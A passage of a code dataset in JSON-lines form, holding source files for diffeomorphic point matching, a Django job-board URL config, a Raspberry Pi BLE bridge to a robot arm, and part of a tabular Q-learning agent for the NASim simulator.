return(loadmat(origin_name))\n\n\n@click.command()\n@click.option('--origin', help='origin matrix file, (x,y)')\n@click.option('--sigma_i', help='Range of the norm, default behavior assume data in [0, 1]', default=0.4)\n@click.option('--sigma_v', help='Range of the norm, practically same as sigma_i', default=0.4)\n@click.option('--sigma_r', help='Trade-off parameter between regularity of deformation and precision of the method', default=0.1)\n@click.option('--precision', is_flag=True, help=\"If set to true, will execute an additional step for precision improvement. default:True\", default=True)\n\ndef main(*args, **kwargs):\n    x_4 = import_matrices(origin_name=kwargs['origin'])\n    x4, y4 = [v for (k, v) in x_4.items() if not k.startswith('__')]\n    sigmaI = kwargs['sigma_i']\n    sigmaV = kwargs['sigma_v']\n    sigmaR = kwargs['sigma_r']\n    FLAG_PRECISION = kwargs['precision']\n    mu = Mesure(torch.tensor(x4, dtype = torch.float32), 1*torch.rand(x4.shape[0])) # Origin points with random weights given to data to illustrate\n    nu = Mesure(torch.tensor(y4, dtype = torch.float32), 10*torch.rand(y4.shape[0])) # Target points again with randomized weights\n\n    alpha_0 = torch.zeros(np.shape(mu.point), requires_grad = True)\n    alpha_test = grad_descent2(mu, nu, 0.0000000001, 20, sigmaI, sigmaV, sigmaR,\\\n    alpha_0 )\n    v_test = construction_v(mu, alpha_test, sigmaV)\n\n    if FLAG_PRECISION == True:\n        for j in range(4):\n            sigmaI = sigmaI/2\n            alpha_test = grad_descent2(mu, nu, 0.0000000001, 100, sigmaI, sigmaV\\\n            , sigmaR, alpha_test)\n\n    v_test = construction_v(mu, alpha_test, sigmaV).detach().numpy()\n    plt.title(\"Point matching:\")\n    plt.scatter(mu.point[:, 0], mu.point[:, 1], c='r')\n    plt.scatter(nu.point[:, 0], nu.point[:, 1], c='g')\n    plt.legend((\"Source points\", \"Target points\"))\n    m, d = np.shape(mu.point)\n    for ligne in range(0, m):\n        plt.arrow(mu.point[ligne, 0], mu.point[ligne, 1], v_test[ligne, 0], v_test[ligne, 1])\n    plt.show()\n\n\nif __name__ == '__main__':\n    main()", "repo_name": "MBlackmane/Diffeomorphic-matchings", "sub_path": "diffeomorphic.py", "file_name": "diffeomorphic.py", "file_ext": "py", "file_size_in_byte": 4391, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "torch.exp", "line_number": 18, "usage_type": "call"}, {"api_name": "torch.exp", "line_number": 21, "usage_type": "call"}, {"api_name": "torch.norm", "line_number": 21, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 24, "usage_type": "call"}, {"api_name": "torch.mul", "line_number": 24, "usage_type": "call"}, {"api_name": "torch.mm", "line_number": 24, "usage_type": "call"}, {"api_name": "torch.t", "line_number": 24, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 25, "usage_type": "call"}, {"api_name": "torch.transpose", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 25, "usage_type": "attribute"}, {"api_name": "torch.sum", "line_number": 28, "usage_type": "call"}, {"api_name": "torch.mul", "line_number": 28, "usage_type": "call"}, {"api_name": "torch.mm", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 28, "usage_type": "attribute"}, {"api_name": "torch.t", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 29, "usage_type": "attribute"}, {"api_name": "torch.sum", "line_number": 29, "usage_type": "call"}, {"api_name": "torch.transpose", "line_number": 29, "usage_type": "call"}, {"api_name": 
"torch.sum", "line_number": 32, "usage_type": "call"}, {"api_name": "torch.mul", "line_number": 32, "usage_type": "call"}, {"api_name": "torch.mm", "line_number": 32, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 32, "usage_type": "attribute"}, {"api_name": "torch.t", "line_number": 32, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 33, "usage_type": "attribute"}, {"api_name": "torch.sum", "line_number": 33, "usage_type": "call"}, {"api_name": "torch.transpose", "line_number": 33, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 36, "usage_type": "call"}, {"api_name": "torch.mul", "line_number": 36, "usage_type": "call"}, {"api_name": "torch.mm", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 36, "usage_type": "attribute"}, {"api_name": "torch.t", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 37, "usage_type": "attribute"}, {"api_name": "torch.sum", "line_number": 37, "usage_type": "call"}, {"api_name": "torch.transpose", "line_number": 37, "usage_type": "call"}, {"api_name": "torch.mm", "line_number": 55, "usage_type": "call"}, {"api_name": "torch.t", "line_number": 55, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 55, "usage_type": "call"}, {"api_name": "torch.transpose", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 55, "usage_type": "attribute"}, {"api_name": "re.search", "line_number": 61, "usage_type": "call"}, {"api_name": "scipy.io.loadmat", "line_number": 65, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 82, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 82, "usage_type": "attribute"}, {"api_name": "torch.rand", "line_number": 82, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 83, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 83, "usage_type": "attribute"}, {"api_name": "torch.rand", "line_number": 83, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 85, "usage_type": "call"}, {"api_name": "numpy.shape", "line_number": 85, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 97, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 97, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 98, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 98, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 99, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 99, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 100, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 100, "usage_type": "name"}, {"api_name": "numpy.shape", "line_number": 101, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.arrow", "line_number": 103, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 103, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 104, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 104, "usage_type": "name"}, {"api_name": "click.command", "line_number": 68, "usage_type": "call"}, {"api_name": "click.option", "line_number": 69, "usage_type": "call"}, {"api_name": "click.option", "line_number": 70, "usage_type": "call"}, {"api_name": "click.option", "line_number": 71, "usage_type": "call"}, {"api_name": "click.option", "line_number": 72, 
"usage_type": "call"}, {"api_name": "click.option", "line_number": 73, "usage_type": "call"}]} +{"seq_id": "10013472853", "text": "from django.conf.urls.static import static\nfrom django.conf import settings\nfrom django.conf.urls import url, include\nfrom . import views\n\nurlpatterns = [\n url(r'^$', views.oferta_list, name='oferta_list'), #oferta_list jest defaultowo włączana jako strona głowna\n url(r'^oferta/$', views.oferta_list, name='oferta_list'),\n url(r'^oferta/(?P\\d+)/$', views.oferta_detail, name='oferta_detail'),\n url(r'^oferta/f=branza$', views.oferta_list_filter_branza, name='oferta_list_filter_branza'),\n url(r'^oferta/f=wakat$', views.oferta_list_filter_wakat, name='oferta_list_filter_wakat'),\n url(r'^oferta/f=lokalizacja$', views.oferta_list_filter_lokalizacja, name='oferta_list_filter_lokalizacja'),\n url(r'^oferta/f=wynagrodzenie$', views.oferta_list_filter_wynagrodzenie, name='oferta_list_filter_wynagrodzenie'),\n url(r'^firma/$', views.firma_list, name='firma_list'),\n url(r'^firma/(?P\\d+)/$', views.firma_detail, name='firma_detail'),\n url(r'^firma/f=nazwa_firmy$', views.firma_list_filter_nazwa_firmy, name='firma_list_filter_nazwa_firmy'),\n url(r'^firma/f=miasto$', views.firma_list_filter_miasto, name='firma_list_filter_miasto'),\n\n url(r'^aplikant/$', views.aplikant_list, name='aplikant_list'),\n url(r'^aplikant/f=wiek$', views.aplikant_list_filter_wiek, name='aplikant_list_filter_wiek'),\n url(r'^aplikant/f=imie$', views.aplikant_list_filter_imie, name='aplikant_list_filter_imie'),\n url(r'^aplikant/f=wyksztalcenie$', views.aplikant_list_filter_wyksztalcenie, name='aplikant_list_filter_wyksztalcenie'),\n url(r'^aplikant/(?P\\d+)/$', views.aplikant_detail, name='aplikant_detail'),\n\n\n url(r'^register/$', views.Register.as_view(), name='register'),\n url(r'^register/success$', views.register_success, name='register_success'),\n url(r'^upload/success$', views.upload_success, name='upload_success'),\n url(r'^aplication/success$', views.aplication_success, name='aplication_success'),\n url(r'^login/', views.login_view, name='login'),\n url(r'^logout/', views.logout_view, name='logout'),\n url(r'^update/(?P\\d+)/$', views.edit_user, name='account_update'),\n\n url(r'^add/oferta/$', views.add_oferta, name='add_oferta'),\n url(r'^edit/oferts/(?P\\d+)/$', views.edit_oferts, name='edit_oferts'),\n url(r'^aplications/$', views.show_aplications, name='show_aplications'),\n\n url(r'^upload_cv/$', views.upload_cv, name='upload_cv'),\n url(r'^aplication/$', views.add_aplication,name='add_aplication'),\n\n url(r'^captcha/', include('captcha.urls')),\n]\nif settings.DEBUG:\n urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)", "repo_name": "slawekrom/RSWTA_Projekt", "sub_path": "projekt/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 2649, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.conf.urls.url", "line_number": 7, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 8, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 9, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 10, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 11, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 12, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 13, "usage_type": "call"}, {"api_name": 
"django.conf.urls.url", "line_number": 14, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 15, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 16, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 17, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 19, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 20, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 21, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 22, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 23, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 26, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 27, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 28, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 29, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 30, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 31, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 32, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 34, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 35, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 36, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 38, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 39, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 41, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 41, "usage_type": "call"}, {"api_name": "django.conf.settings.DEBUG", "line_number": 43, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 43, "usage_type": "name"}, {"api_name": "django.conf.urls.static.static", "line_number": 44, "usage_type": "call"}, {"api_name": "django.conf.settings.MEDIA_URL", "line_number": 44, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 44, "usage_type": "name"}, {"api_name": "django.conf.settings.MEDIA_ROOT", "line_number": 44, "usage_type": "attribute"}]} +{"seq_id": "74010404995", "text": "# For Saving and Receiving/Sending Data\nimport json\nimport serial\nimport time\n\n# For Uart Connection\nimport sys\nimport dbus, dbus.mainloop.glib\nfrom gi.repository import GLib\nfrom example_advertisement import Advertisement\nfrom example_advertisement import register_ad_cb, register_ad_error_cb\nfrom example_gatt_server import Service, Characteristic\nfrom example_gatt_server import register_app_cb, register_app_error_cb\n \nBLUEZ_SERVICE_NAME = 'org.bluez'\nDBUS_OM_IFACE = 'org.freedesktop.DBus.ObjectManager'\nLE_ADVERTISING_MANAGER_IFACE = 'org.bluez.LEAdvertisingManager1'\nGATT_MANAGER_IFACE = 'org.bluez.GattManager1'\nGATT_CHRC_IFACE = 'org.bluez.GattCharacteristic1'\nUART_SERVICE_UUID = '6e400001-b5a3-f393-e0a9-e50e24dcca9e'\nUART_RX_CHARACTERISTIC_UUID = '6e400002-b5a3-f393-e0a9-e50e24dcca9e'\nUART_TX_CHARACTERISTIC_UUID = '6e400003-b5a3-f393-e0a9-e50e24dcca9e'\nLOCAL_NAME = 'Robot Arm'\nmainloop = None\n\n# Joint position data file name\njointPositionsFile = \"/home/pi/PROJET_ARGYLL/ble-uart-peripheral/data.json\"\n\n# Serial setup\nser = serial.Serial('/dev/ttyACM0', baudrate = 9600 , timeout=1)\n# ser.flush()\n\ndef SendingToOpenCr(self,data):\n 
Data_encode = data.encode('utf-8')\n    ser.write(Data_encode)\n    ser.flush()\n    time.sleep(.01)\n\n    while (ser.in_waiting > 0):\n\n        line = ser.readline().decode('utf-8').rstrip()\n\n        if (line and line[0] == \"<\"): # guard against empty lines\n            print(\"From OpenCr: \"+line)\n            send.send_tx(line)\n            time.sleep(0.01) \n\n        if (line == \"[\"):\n            print(\"Receiving and saving joint positions\")\n            data = {} # Init data dict\n            data['jointPositions'] = []\n            while True:\n                line = ser.readline().decode('utf-8').rstrip() # Read serial input until '\\n'\n                if (line == \"]\") or (line.find(\"{\") == -1):\n                    break\n                lineArray = line.strip(\"{}\").split(':') # Removes brackets and splits on ':'\n                data['jointPositions'].append({'positionID' : lineArray[0],'positionName' : lineArray[1],'joints' : lineArray[2].split(',')})\n            with open(jointPositionsFile, 'w') as outfile:\n                json.dump(data, outfile, indent=3)\n            print(\"End of saving joint positions\")\n            outfile.close()\n\n        if (line == \"WaitingForSavingFile\"):\n            print(\"Sending all data from the JSON file to the Arduino\")\n            with open(jointPositionsFile) as infile:\n                data = json.load(infile)\n                print(\"[\")\n                Data = \"[\"\n                ser.write(Data.encode('utf-8'))\n                for jPos in data[\"jointPositions\"]:\n                    Data = \"{\"+jPos[\"positionID\"] + \":\" + jPos[\"positionName\"] + \":\" + str(jPos[\"joints\"]).replace(\"'\",\"\").strip(\"[]\").replace(\" \",\"\")+\",}\"+\"\\n\"\n                    Data_encode = Data.encode('utf-8')\n                    ser.write(Data_encode)\n                    print(\"{\"+jPos[\"positionID\"] + \":\" + jPos[\"positionName\"] + \":\" + str(jPos[\"joints\"]).replace(\"'\",\"\").strip(\"[]\").replace(\" \",\"\")+\",}\")\n                print(\"]\")\n                Data = \"]\"\n                ser.write(Data.encode('utf-8'))\n                while (ser.in_waiting > 0):\n                    line = ser.readline().decode('utf-8').rstrip()\n                    print(line)\n                    time.sleep(0.01)\n            infile.close() \n            print(\"\")\n    \n    \n\n\n    \nclass TxCharacteristic(Characteristic):\n\n    def __init__(self, bus, index, service):\n        Characteristic.__init__(self, bus, index, UART_TX_CHARACTERISTIC_UUID,\n                                ['notify'], service)\n        self.notifying = False\n        global send\n        send = self\n        GLib.io_add_watch(sys.stdin, GLib.IO_IN, self.on_console_input)\n\n    \n    def on_console_input(self, fd, condition):\n        s = fd.readline()\n        if s.isspace():\n            pass\n        else:\n            SendingToOpenCr(self,s)\n            self.send_tx(s)\n        return True\n    \n    def send_tx(self, s):\n        if not self.notifying:\n            return\n        value = []\n        for c in s:\n            value.append(dbus.Byte(c.encode()))\n        self.PropertiesChanged(GATT_CHRC_IFACE, {'Value': value}, [])\n    \n    \n    def StartNotify(self):\n        if self.notifying:\n            return\n        self.notifying = True\n    \n    def StopNotify(self):\n        if not self.notifying:\n            return\n        self.notifying = False\n\n\n\n    def send(self, s):\n        # encode the string and emit it as a GATT notification\n        value = []\n        for c in s:\n            value.append(dbus.Byte(c.encode()))\n        self.PropertiesChanged(GATT_CHRC_IFACE, {'Value': value}, [])\n\n\n    \nclass RxCharacteristic(Characteristic):\n    def __init__(self, bus, index, service):\n        Characteristic.__init__(self, bus, index, UART_RX_CHARACTERISTIC_UUID,\n                                ['write'], service)\n\n\n\n    \n\n# Sending/Receiving Data To/From OpenCr and Android    \n    \n    def WriteValue(self, value, options):\n        self.line = \"\"\n        Data = format(bytearray(value).decode()) #+ \"\\n\"\n        print(\"From Android: \"+Data)\n        SendingToOpenCr(self,Data)\n    \n\n    \nclass UartService(Service):\n    def __init__(self, bus, index):\n        Service.__init__(self, bus, index, UART_SERVICE_UUID, True)\n        self.add_characteristic(TxCharacteristic(bus, 0, self))\n        self.add_characteristic(RxCharacteristic(bus, 1, self))\n    \n    \nclass Application(dbus.service.Object):\n    def 
__init__(self, bus):\n self.path = '/'\n self.services = []\n dbus.service.Object.__init__(self, bus, self.path)\n \n def get_path(self):\n return dbus.ObjectPath(self.path)\n \n def add_service(self, service):\n self.services.append(service)\n \n @dbus.service.method(DBUS_OM_IFACE, out_signature='a{oa{sa{sv}}}')\n def GetManagedObjects(self):\n response = {}\n for service in self.services:\n response[service.get_path()] = service.get_properties()\n chrcs = service.get_characteristics()\n for chrc in chrcs:\n response[chrc.get_path()] = chrc.get_properties()\n return response\n \nclass UartApplication(Application):\n def __init__(self, bus):\n Application.__init__(self, bus)\n self.add_service(UartService(bus, 0))\n \nclass UartAdvertisement(Advertisement):\n def __init__(self, bus, index):\n Advertisement.__init__(self, bus, index, 'peripheral')\n self.add_service_uuid(UART_SERVICE_UUID)\n self.add_local_name(LOCAL_NAME)\n self.include_tx_power = True\n \ndef find_adapter(bus):\n remote_om = dbus.Interface(bus.get_object(BLUEZ_SERVICE_NAME, '/'),\n DBUS_OM_IFACE)\n objects = remote_om.GetManagedObjects()\n for o, props in objects.items():\n if LE_ADVERTISING_MANAGER_IFACE in props and GATT_MANAGER_IFACE in props:\n return o\n print('Skip adapter:', o)\n return\n\n\n\n\n# FOR SAVING ON THE START\n\ndef StartupSaving():\n\n line = \"\"\n\n #Data = \"\"\n #Data_encode = Data.encode('utf-8')\n #ser.write(Data_encode)\n #ser.flush()\n #time.sleep(.01)\n\n\n #while (line!=\"WaitingForSavingFile\"):\n line = ser.readline().decode('utf-8').rstrip()\n \n if (line == \"WaitingForSavingFile\"):\n print(\"Sending all data from the JSON file to the Arduino\")\n with open(jointPositionsFile) as infile:\n data = json.load(infile)\n print(\"[\")\n Data = \"[\"\n ser.write(Data.encode('utf-8'))\n for jPos in data[\"jointPositions\"]:\n Data = \"{\"+jPos[\"positionID\"] + \":\" + jPos[\"positionName\"] + \":\" + str(jPos[\"joints\"]).replace(\"'\",\"\").strip(\"[]\").replace(\" \",\"\")+\",}\"+\"\\n\"\n Data_encode = Data.encode('utf-8')\n ser.write(Data_encode)\n print(\"{\"+jPos[\"positionID\"] + \":\" + jPos[\"positionName\"] + \":\" + str(jPos[\"joints\"]).replace(\"'\",\"\").strip(\"[]\").replace(\" \",\"\")+\",}\")\n print(\"]\")\n Data = \"]\"\n ser.write(Data.encode('utf-8'))\n while (ser.in_waiting > 0):\n line = ser.readline().decode('utf-8').rstrip()\n print(line)\n time.sleep(0.01)\n infile.close()\n\n\n\n \n \n\n \ndef main():\n\n StartupSaving()\n #Data = \"\"\n #ser.write(Data.encode('utf-8')) \n \n global mainloop\n dbus.mainloop.glib.DBusGMainLoop(set_as_default=True)\n bus = dbus.SystemBus()\n adapter = find_adapter(bus)\n if not adapter:\n print('BLE adapter not found')\n return\n \n service_manager = dbus.Interface(\n bus.get_object(BLUEZ_SERVICE_NAME, adapter),\n GATT_MANAGER_IFACE)\n ad_manager = dbus.Interface(bus.get_object(BLUEZ_SERVICE_NAME, adapter),\n LE_ADVERTISING_MANAGER_IFACE)\n \n app = UartApplication(bus)\n adv = UartAdvertisement(bus, 0)\n \n mainloop = GLib.MainLoop()\n \n service_manager.RegisterApplication(app.get_path(), {},\n reply_handler=register_app_cb,\n error_handler=register_app_error_cb)\n ad_manager.RegisterAdvertisement(adv.get_path(), {},\n reply_handler=register_ad_cb,\n error_handler=register_ad_error_cb)\n\n try:\n mainloop.run()\n except KeyboardInterrupt:\n adv.Release()\n\n \n \nif __name__ == '__main__':\n main()\n", "repo_name": "charles-maheu/Argyll---developement", "sub_path": "Software/Code_For_RaspberryPi/Main.py", "file_name": "Main.py", 
"file_ext": "py", "file_size_in_byte": 9761, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "serial.Serial", "line_number": 30, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 37, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 46, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 59, "usage_type": "call"}, {"api_name": "json.load", "line_number": 66, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 81, "usage_type": "call"}, {"api_name": "example_gatt_server.Characteristic", "line_number": 89, "usage_type": "name"}, {"api_name": "example_gatt_server.Characteristic.__init__", "line_number": 92, "usage_type": "call"}, {"api_name": "example_gatt_server.Characteristic", "line_number": 92, "usage_type": "name"}, {"api_name": "gi.repository.GLib.io_add_watch", "line_number": 97, "usage_type": "call"}, {"api_name": "gi.repository.GLib", "line_number": 97, "usage_type": "name"}, {"api_name": "sys.stdin", "line_number": 97, "usage_type": "attribute"}, {"api_name": "gi.repository.GLib.IO_IN", "line_number": 97, "usage_type": "attribute"}, {"api_name": "dbus.Byte", "line_number": 114, "usage_type": "call"}, {"api_name": "dbus.Byte", "line_number": 135, "usage_type": "call"}, {"api_name": "example_gatt_server.Characteristic", "line_number": 140, "usage_type": "name"}, {"api_name": "example_gatt_server.Characteristic.__init__", "line_number": 142, "usage_type": "call"}, {"api_name": "example_gatt_server.Characteristic", "line_number": 142, "usage_type": "name"}, {"api_name": "example_gatt_server.Service", "line_number": 159, "usage_type": "name"}, {"api_name": "example_gatt_server.Service.__init__", "line_number": 161, "usage_type": "call"}, {"api_name": "example_gatt_server.Service", "line_number": 161, "usage_type": "name"}, {"api_name": "dbus.service", "line_number": 166, "usage_type": "attribute"}, {"api_name": "dbus.service.Object.__init__", "line_number": 170, "usage_type": "call"}, {"api_name": "dbus.service", "line_number": 170, "usage_type": "attribute"}, {"api_name": "dbus.ObjectPath", "line_number": 173, "usage_type": "call"}, {"api_name": "dbus.service.method", "line_number": 178, "usage_type": "call"}, {"api_name": "dbus.service", "line_number": 178, "usage_type": "attribute"}, {"api_name": "example_advertisement.Advertisement", "line_number": 193, "usage_type": "name"}, {"api_name": "example_advertisement.Advertisement.__init__", "line_number": 195, "usage_type": "call"}, {"api_name": "example_advertisement.Advertisement", "line_number": 195, "usage_type": "name"}, {"api_name": "dbus.Interface", "line_number": 201, "usage_type": "call"}, {"api_name": "json.load", "line_number": 232, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 247, "usage_type": "call"}, {"api_name": "dbus.mainloop.glib.DBusGMainLoop", "line_number": 263, "usage_type": "call"}, {"api_name": "dbus.mainloop", "line_number": 263, "usage_type": "attribute"}, {"api_name": "dbus.SystemBus", "line_number": 264, "usage_type": "call"}, {"api_name": "dbus.Interface", "line_number": 270, "usage_type": "call"}, {"api_name": "dbus.Interface", "line_number": 273, "usage_type": "call"}, {"api_name": "gi.repository.GLib.MainLoop", "line_number": 279, "usage_type": "call"}, {"api_name": "gi.repository.GLib", "line_number": 279, "usage_type": "name"}, {"api_name": "example_gatt_server.register_app_cb", "line_number": 282, "usage_type": "name"}, {"api_name": 
"example_gatt_server.register_app_error_cb", "line_number": 283, "usage_type": "name"}, {"api_name": "example_advertisement.register_ad_cb", "line_number": 285, "usage_type": "name"}, {"api_name": "example_advertisement.register_ad_error_cb", "line_number": 286, "usage_type": "name"}]} +{"seq_id": "19216368913", "text": "\"\"\"An example Tabular, epsilon greedy Q-Learning Agent.\n\nThis agent does not use an Experience replay (see the 'ql_replay_agent.py')\n\nIt uses pytorch 1.5+ tensorboard library for logging (HINT: these dependencies\ncan be installed by running pip install nasim[dqn])\n\nTo run 'tiny' benchmark scenario with default settings, run the following from\nthe nasim/agents dir:\n\n$ python ql_agent.py tiny\n\nTo see detailed results using tensorboard:\n\n$ tensorboard --logdir runs/\n\nTo see available hyperparameters:\n\n$ python ql_agent.py --help\n\nNotes\n-----\n\nThis is by no means a state of the art implementation of Tabular Q-Learning.\nIt is designed to be an example implementation that can be used as a reference\nfor building your own agents and for simple experimental comparisons.\n\"\"\"\nimport random\nimport numpy as np\nfrom pprint import pprint\n\nimport nasim\n\ntry:\n from torch.utils.tensorboard import SummaryWriter\nexcept ImportError as e:\n from gymnasium import error\n raise error.DependencyNotInstalled(\n f\"{e}. (HINT: you can install tabular_q_learning_agent dependencies \"\n \"by running 'pip install nasim[dqn]'.)\"\n )\n\n\nclass TabularQFunction:\n \"\"\"Tabular Q-Function \"\"\"\n\n def __init__(self, num_actions):\n self.q_func = dict()\n self.num_actions = num_actions\n\n def __call__(self, x):\n return self.forward(x)\n\n def forward(self, x):\n if isinstance(x, np.ndarray):\n x = str(x.astype(np.int))\n if x not in self.q_func:\n self.q_func[x] = np.zeros(self.num_actions, dtype=np.float32)\n return self.q_func[x]\n\n def forward_batch(self, x_batch):\n return np.asarray([self.forward(x) for x in x_batch])\n\n def update_batch(self, s_batch, a_batch, delta_batch):\n for s, a, delta in zip(s_batch, a_batch, delta_batch):\n q_vals = self.forward(s)\n q_vals[a] += delta\n\n def update(self, s, a, delta):\n q_vals = self.forward(s)\n q_vals[a] += delta\n\n def get_action(self, x):\n return int(self.forward(x).argmax())\n\n def display(self):\n pprint(self.q_func)\n\n\nclass TabularQLearningAgent:\n \"\"\"A Tabular. 
epsilon greedy Q-Learning Agent \"\"\"\n\n    def __init__(self,\n                 env,\n                 seed=None,\n                 lr=0.001,\n                 training_steps=10000,\n                 final_epsilon=0.05,\n                 exploration_steps=10000,\n                 gamma=0.99,\n                 verbose=True,\n                 **kwargs):\n\n        # This implementation only works for flat actions\n        assert env.flat_actions\n        self.verbose = verbose\n        if self.verbose:\n            print(\"\\nRunning Tabular Q-Learning with config:\")\n            pprint(locals())\n\n        # set seeds\n        self.seed = seed\n        if self.seed is not None:\n            np.random.seed(self.seed)\n\n        # environment setup\n        self.env = env\n\n        self.num_actions = self.env.action_space.n\n        self.obs_dim = self.env.observation_space.shape\n\n        # logger setup\n        self.logger = SummaryWriter()\n\n        # Training related attributes\n        self.lr = lr\n        self.exploration_steps = exploration_steps\n        self.final_epsilon = final_epsilon\n        self.epsilon_schedule = np.linspace(\n            1.0, self.final_epsilon, self.exploration_steps\n        )\n        self.discount = gamma\n        self.training_steps = training_steps\n        self.steps_done = 0\n\n        # Q-Function\n        self.qfunc = TabularQFunction(self.num_actions)\n\n    def get_epsilon(self):\n        if self.steps_done < self.exploration_steps:\n            return self.epsilon_schedule[self.steps_done]\n        return self.final_epsilon\n\n    def get_egreedy_action(self, o, epsilon):\n        if random.random() > epsilon:\n            return self.qfunc.get_action(o)\n        return random.randint(0, self.num_actions-1)\n\n    def optimize(self, s, a, next_s, r, done):\n        # get q_val for state and action performed in that state\n        q_vals_raw = self.qfunc.forward(s)\n        q_val = q_vals_raw[a]\n\n        # get target q val = max val of next state\n        target_q_val = self.qfunc.forward(next_s).max()\n        target = r + self.discount * (1-done) * target_q_val\n\n        # calculate error and update\n        td_error = target - q_val\n        td_delta = self.lr * td_error\n\n        # optimize the model\n        self.qfunc.update(s, a, td_delta)\n\n        s_value = q_vals_raw.max()\n        return td_error, s_value\n\n    def train(self):\n        if self.verbose:\n            print(\"\\nStarting training\")\n\n        num_episodes = 0\n        training_steps_remaining = self.training_steps\n\n        while self.steps_done < self.training_steps:\n            ep_results = self.run_train_episode(training_steps_remaining)\n            ep_return, ep_steps, goal = ep_results\n            num_episodes += 1\n            training_steps_remaining -= ep_steps\n\n            self.logger.add_scalar(\"episode\", num_episodes, self.steps_done)\n            self.logger.add_scalar(\n                \"epsilon\", self.get_epsilon(), self.steps_done\n            )\n            self.logger.add_scalar(\n                \"episode_return\", ep_return, self.steps_done\n            )\n            self.logger.add_scalar(\n                \"episode_steps\", ep_steps, self.steps_done\n            )\n            self.logger.add_scalar(\n                \"episode_goal_reached\", int(goal), self.steps_done\n            )\n\n            if num_episodes % 10 == 0 and self.verbose:\n                print(f\"\\nEpisode {num_episodes}:\")\n                print(f\"\\tsteps done = {self.steps_done} / \"\n                      f\"{self.training_steps}\")\n                print(f\"\\treturn = {ep_return}\")\n                print(f\"\\tgoal = {goal}\")\n\n        self.logger.close()\n        if self.verbose:\n            print(\"Training complete\")\n            print(f\"\\nEpisode {num_episodes}:\")\n            print(f\"\\tsteps done = {self.steps_done} / {self.training_steps}\")\n            print(f\"\\treturn = {ep_return}\")\n            print(f\"\\tgoal = {goal}\")\n\n    def run_train_episode(self, step_limit):\n        s, _ = self.env.reset()\n        done = False\n        env_step_limit_reached = False\n\n        steps = 0\n        episode_return = 0\n\n        while not done and not env_step_limit_reached and steps < step_limit:\n            a = self.get_egreedy_action(s, self.get_epsilon())\n\n            next_s, r, done, 